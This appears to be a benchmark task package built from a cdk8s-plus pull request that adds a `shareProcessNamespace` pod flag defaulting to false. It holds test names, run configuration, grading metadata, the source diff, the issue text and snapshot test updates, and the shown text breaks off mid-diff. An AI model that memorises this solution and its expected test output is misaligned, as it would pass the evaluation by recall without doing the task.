addDefaultBackend()", "defaultBackend and rules", "two rules for the same path (no host)", "two rules for the same path and host", "Can add only resource requests", "Can add only resource limits", "Can add only limits and requests on memory", "Can add only limits and requests on cpu", "Can add only limits and requests on emphemeral-storage", "Can add only limits on emphemeral-storage", "default security context", "custom security context", "seccompProfile localhostProfile can not be used if type is not Localhost", "seccompProfile localhostProfile must only be set if type is Localhost", "can configure a postStart lifecycle hook", "can configure a preStop lifecycle hook", "Can be created from value", "Can be created from config map name", "Can be created from secret value", "Can be created from ISecret.envValue", "Can be created from new secret.envValue", "Cannot be created from missing required process env", "Can be created from missing optional process env", "Can be created from existing process env", "Can be created from fieldRef", "Can be created from fieldRef with key", "Can not be created from fieldRef without key", "Can be created from resourceFieldRef", "Can be created from resourceFieldRef with divisor", "Can be created from resourceFieldRef with container", "cannot configure identical ports and protocols at instantiation", "can configure identical ports with different protocols at instantiation", "cannot add an already existing port number with identical protocol", "can add an already existing port number with a different protocol", "cannot add an already existing port name", "can configure multiple ports", "portNumber is equivalent to port", "Must use container props", "Can add environment variable", "can add environment variables from a source", "can add environment variables from a secret", "Can mount container to volume", "mount options", "mount from ctor", "\"readiness\", \"liveness\", and \"startup\" can be used to define probes", "Can add resource 
limits and requests", "throws error at synth, when metrics are not provided and target container does not have resource constraints specified", "throws error, when minReplicas is more than maxReplicas", "throws error, when scaleUp.stabilizationWindow is more than 1 hour", "throws error, when scaleDown.stabilizationWindow is more than 1 hour", "throws error, when scaleUp.stabilizationWindow is -1", "throws error, when scaleDown.stabilizationWindow is -1 seconds", "throws error, when scaleUp policy has a duration longer than 30 minutes", "throws error, when scaleDown policy has a duration longer than 30 minutes", "throws error, when scaleUp policy has a duration set to 0", "throws error, when scaleDown policy has a duration set to 0", "throws error, when scaleUp policy has a duration set to -10 minutes", "throws error, when scaleDown policy has a duration set to -10 minutes", "throws error at synth, when Deployment target has replicas defined", "throws error at synth, when StatefulSet target has replicas defined", "Must be configured with at least one port", "Can provide cluster IP", "Can serve by port", "Must set externalIPs if provided", "Must be configured with externalName if type is EXTERNAL_NAME", "Type defaults to EXTERNAL_NAME if externalName if given", "Can restrict CIDR IP addresses for a LoadBalancer type", "can be exposed by an ingress", "can set publishNotReadyAddresses", "fails with two volumes with the same name", "fails adding a volume with the same name", "fails with a container that has mounts with different volumes of the same name", "can configure multiple mounts with the same volume", "Can add container post instantiation", "Can attach an existing container post instantiation", "Must have at least one container", "Can add volume post instantiation", "Automatically adds volumes from container mounts", "init containers cannot have liveness probe", "init containers cannot have readiness probe", "init containers cannot have startup probe", "sidecar 
containers can have liveness probe", "sidecar containers can have readiness probe", "sidecar containers can have startup probe", "can specify init containers at instantiation", "can add init container post instantiation", "init container names are indexed", "automatically adds volumes from init container mounts", "custom host aliases", "default dns settings", "custom dns settings", "throws if more than 3 nameservers are configured", "throws if more than 6 search domains are configured", "throws if no nameservers are given when dns policy is set to NONE", "can configure auth to docker registry", "auto mounting token defaults to true", "can select pods", "default termination grace period", "custom termination grace period", "custom termination grace period - minutes", "Containers should not specify \"restartPolicy\" field", "only NO_EXECUTE taint queries can specify eviction", "cannot allow to pods selected with namespaces selected by labels", "cannot allow to pods selected in all namespaces", "cannot allow to namespaces selected by labels", "cannot allow to the same peer twice", "allow to create an ingress policy in source namespace when peer doesnt define namespaces", "cannot allow from pods selected with namespaces selected by labels", "cannot allow from pods selected in all namespaces", "cannot allow from namespaces selected by labels", "cannot allow from the same peer twice", "allow from create an ingress policy in source namespace when peer doesnt define namespaces", "can grant read permissions twice with different subjects", "cannot grant permissions twice with same subject", "StatefulSet allows overrides", "default update strategy", "custom update strategy", "can be reserved with default storage class", "can be reserved with a custom storage class", "reserved claim is created in the same namespace as the volume", "throws if reserved twice", "can be bound to a claim at instantiation", "can be bound to a claim post instantiation", "no-ops if bounded twice to 
the same claim", "throws if bounded twice to different claims" ]
Method: AbstractPod.shareProcessNamespace(self) Location: src/pod.ts – added as a public readonly field on the AbstractPod class and exposed through the class instance. Inputs: None (value is initialized from the constructor). Outputs: <boolean> – the value of the `shareProcessNamespace` flag that was supplied in the pod props (defaults to `false`). Description: Indicates whether the pod’s containers share a single process namespace; when `true` processes inside any container are visible to all other containers in the same pod. Function: AbstractPodProps.shareProcessNamespace Location: src/pod.ts – added to the `AbstractPodProps` interface definition. Inputs: <boolean optional> – `shareProcessNamespace` flag supplied when constructing a pod (default `false`). Outputs: None (affects pod configuration). Description: Optional property that enables the Kubernetes `shareProcessNamespace` pod spec field, allowing containers in the pod to share the same process namespace.
Apache-2.0
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "npx jest --verbose --no-colors --testLocationInResults" }
{ "num_modified_files": 1, "num_modified_lines": 11, "pr_author": "cdk8s-automation", "pr_labels": [ "auto-approve: Pull requests that should be auto approved", "backport" ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.97, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "easy", "external_urls": [ "https://github.com/sorenlouv/backport", "https://github.com/cdk8s-team/cdk8s-plus/pull/4902" ], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue requests backporting a feature to add a `shareProcessNamespace` flag to Pods. The test patch adds this field with a default false value across many snapshot files, matching the intended behavior. The tests align with the new property and no unrelated test coupling or naming expectations are present. Therefore the task is well‑specified and solvable.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, 
"test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
2f8b1d2d492366e416677b2dca6ffad53efd8e6a
2025-02-25 06:53:49
cdk8s-team__cdk8s-plus-5354
diff --git a/src/pod.ts b/src/pod.ts index 3ac602bc..14e4dfd2 100644 --- a/src/pod.ts +++ b/src/pod.ts @@ -19,6 +19,7 @@ export abstract class AbstractPod extends base.Resource implements IPodSelector, public readonly dns: PodDns; public readonly dockerRegistryAuth?: secret.ISecret; public readonly automountServiceAccountToken: boolean; + public readonly shareProcessNamespace: boolean; public readonly hostNetwork?: boolean; public readonly terminationGracePeriod?: Duration; @@ -40,6 +41,7 @@ export abstract class AbstractPod extends base.Resource implements IPodSelector, this.dns = new PodDns(props.dns); this.dockerRegistryAuth = props.dockerRegistryAuth; this.automountServiceAccountToken = props.automountServiceAccountToken ?? false; + this.shareProcessNamespace = props.shareProcessNamespace ?? false; this.isolate = props.isolate ?? false; this.hostNetwork = props.hostNetwork ?? false; this.terminationGracePeriod = props.terminationGracePeriod ?? Duration.seconds(30); @@ -249,6 +251,7 @@ export abstract class AbstractPod extends base.Resource implements IPodSelector, setHostnameAsFqdn: dns.hostnameAsFQDN, imagePullSecrets: this.dockerRegistryAuth ? [{ name: this.dockerRegistryAuth.name }] : undefined, automountServiceAccountToken: this.automountServiceAccountToken, + shareProcessNamespace: this.shareProcessNamespace, hostNetwork: this.hostNetwork, terminationGracePeriodSeconds: this.terminationGracePeriod?.toSeconds(), }; @@ -437,6 +440,14 @@ export interface AbstractPodProps extends base.ResourceProps { */ readonly automountServiceAccountToken?: boolean; + /** + * When process namespace sharing is enabled, processes in a container are visible to all other containers in the same pod. + * + * @default false + * @see https://kubernetes.io/docs/tasks/configure-pod-container/share-process-namespace/ + */ + readonly shareProcessNamespace?: boolean; + /** * Isolates the pod. This will prevent any ingress or egress connections to / from this pod. 
* You can however allow explicit connections post instantiation by using the `.connections` property.
feat(pod): shareProcessNamespace (backport #4902) # Backport This will backport the following commits from `k8s-31/main` to `k8s-30/main`: - [feat(pod): shareProcessNamespace (#4902)](https://github.com/cdk8s-team/cdk8s-plus/pull/4902) <!--- Backport version: 9.5.1 --> ### Questions ? Please refer to the [Backport tool documentation](https://github.com/sorenlouv/backport)
**Title** Add support for `shareProcessNamespace` option on Pods **Problem** Users cannot enable process‑namespace sharing for containers within the same pod, limiting scenarios that require cross‑container process visibility (e.g., debugging or side‑car coordination). The existing pod API lacks a property to control this feature, so the generated manifests never include the corresponding Kubernetes field. **Root Cause** The pod abstraction does not expose a `shareProcessNamespace` flag, nor does the manifest‑generation logic copy such a flag into the pod spec. **Fix / Expected Behavior** - Introduce a new optional boolean flag on the pod construct to control process‑namespace sharing. - Default the flag to `false` to preserve current behavior. - Initialise the flag from user‑provided properties. - Propagate the flag into the rendered pod spec so that `shareProcessNamespace: true` appears when requested. - Document the flag with a reference to the official Kubernetes documentation. **Risk & Validation** - Backward compatibility is maintained because the default remains `false`. - Verify that manifests generated with the flag set to `true` contain the `shareProcessNamespace` field and that the field is omitted otherwise. - Run existing unit and integration tests to ensure no regression in pod creation or other properties.
5,354
cdk8s-team/cdk8s-plus
diff --git a/test/__snapshots__/container.test.ts.snap b/test/__snapshots__/container.test.ts.snap index c94d5044..ee03dfa1 100644 --- a/test/__snapshots__/container.test.ts.snap +++ b/test/__snapshots__/container.test.ts.snap @@ -68,6 +68,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -129,6 +130,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -179,6 +181,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -250,6 +253,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -306,6 +310,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, "volumes": Array [ Object { diff --git a/test/__snapshots__/cron-job.test.ts.snap b/test/__snapshots__/cron-job.test.ts.snap index e8f2501a..309c040f 100644 --- a/test/__snapshots__/cron-job.test.ts.snap +++ b/test/__snapshots__/cron-job.test.ts.snap @@ -52,6 +52,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -138,6 +139,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -205,6 +207,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, diff --git a/test/__snapshots__/daemon-set.test.ts.snap b/test/__snapshots__/daemon-set.test.ts.snap index 3b07d8a5..3ab34b83 100644 --- a/test/__snapshots__/daemon-set.test.ts.snap +++ b/test/__snapshots__/daemon-set.test.ts.snap @@ -54,6 +54,7 @@ Array [ 
"runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -134,6 +135,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -196,6 +198,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, diff --git a/test/__snapshots__/deployment.test.ts.snap b/test/__snapshots__/deployment.test.ts.snap index 4a656e0c..8979adee 100644 --- a/test/__snapshots__/deployment.test.ts.snap +++ b/test/__snapshots__/deployment.test.ts.snap @@ -74,6 +74,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -194,6 +195,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -293,6 +295,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -402,6 +405,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -495,6 +499,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -586,6 +591,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -676,6 +682,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -747,6 +754,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -830,6 +838,7 @@ Array [ "runAsNonRoot": true, }, 
"setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -901,6 +910,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -981,6 +991,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1074,6 +1085,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1164,6 +1176,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1235,6 +1248,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1318,6 +1332,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1389,6 +1404,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1469,6 +1485,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1562,6 +1579,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1652,6 +1670,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1740,6 +1759,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1825,6 +1845,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, 
"terminationGracePeriodSeconds": 30, }, }, @@ -1877,6 +1898,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, "tolerations": Array [ Object { @@ -2000,6 +2022,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, diff --git a/test/__snapshots__/horizontal-pod-autoscaler.test.ts.snap b/test/__snapshots__/horizontal-pod-autoscaler.test.ts.snap index c4a24c10..5381f2a1 100644 --- a/test/__snapshots__/horizontal-pod-autoscaler.test.ts.snap +++ b/test/__snapshots__/horizontal-pod-autoscaler.test.ts.snap @@ -62,6 +62,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -177,6 +178,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -305,6 +307,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -433,6 +436,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -561,6 +565,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -688,6 +693,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -815,6 +821,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -942,6 +949,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1069,6 +1077,7 @@ Array [ "runAsNonRoot": true, }, 
"setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1196,6 +1205,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1323,6 +1333,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1450,6 +1461,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1578,6 +1590,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1710,6 +1723,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1844,6 +1858,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2012,6 +2027,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2146,6 +2162,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2266,6 +2283,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2394,6 +2412,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2509,6 +2528,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2633,6 +2653,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, 
"terminationGracePeriodSeconds": 30, }, }, @@ -2754,6 +2775,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2869,6 +2891,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2990,6 +3013,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, "volumes": Array [ Object { diff --git a/test/__snapshots__/job.test.ts.snap b/test/__snapshots__/job.test.ts.snap index 5aca1007..106074f8 100644 --- a/test/__snapshots__/job.test.ts.snap +++ b/test/__snapshots__/job.test.ts.snap @@ -48,6 +48,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, diff --git a/test/__snapshots__/network-policy.test.ts.snap b/test/__snapshots__/network-policy.test.ts.snap index 514e47f9..470cf8bd 100644 --- a/test/__snapshots__/network-policy.test.ts.snap +++ b/test/__snapshots__/network-policy.test.ts.snap @@ -136,6 +136,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -181,6 +182,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -267,6 +269,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -331,6 +334,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -419,6 +423,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -502,6 +507,7 @@ Array [ "runAsNonRoot": true, }, 
"setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -584,6 +590,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -671,6 +678,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -766,6 +774,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -857,6 +866,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -962,6 +972,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1048,6 +1059,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1135,6 +1147,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1180,6 +1193,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1266,6 +1280,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1330,6 +1345,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1418,6 +1434,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1501,6 +1518,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, 
"terminationGracePeriodSeconds": 30, }, }, @@ -1583,6 +1601,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1670,6 +1689,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1765,6 +1785,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1856,6 +1877,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1961,6 +1983,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2047,6 +2070,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2134,6 +2158,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2217,6 +2242,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, diff --git a/test/__snapshots__/pod.test.ts.snap b/test/__snapshots__/pod.test.ts.snap index 137d7e68..3b173625 100644 --- a/test/__snapshots__/pod.test.ts.snap +++ b/test/__snapshots__/pod.test.ts.snap @@ -44,6 +44,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -99,6 +100,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -173,6 +175,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ 
-291,6 +294,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -341,6 +345,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -417,6 +422,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -467,6 +473,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -543,6 +550,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -593,6 +601,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -721,6 +730,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -771,6 +781,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -847,6 +858,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -897,6 +909,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -973,6 +986,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1023,6 +1037,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1127,6 +1142,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + 
"shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1206,6 +1222,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1324,6 +1341,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1431,6 +1449,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1481,6 +1500,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1607,6 +1627,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1659,6 +1680,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ 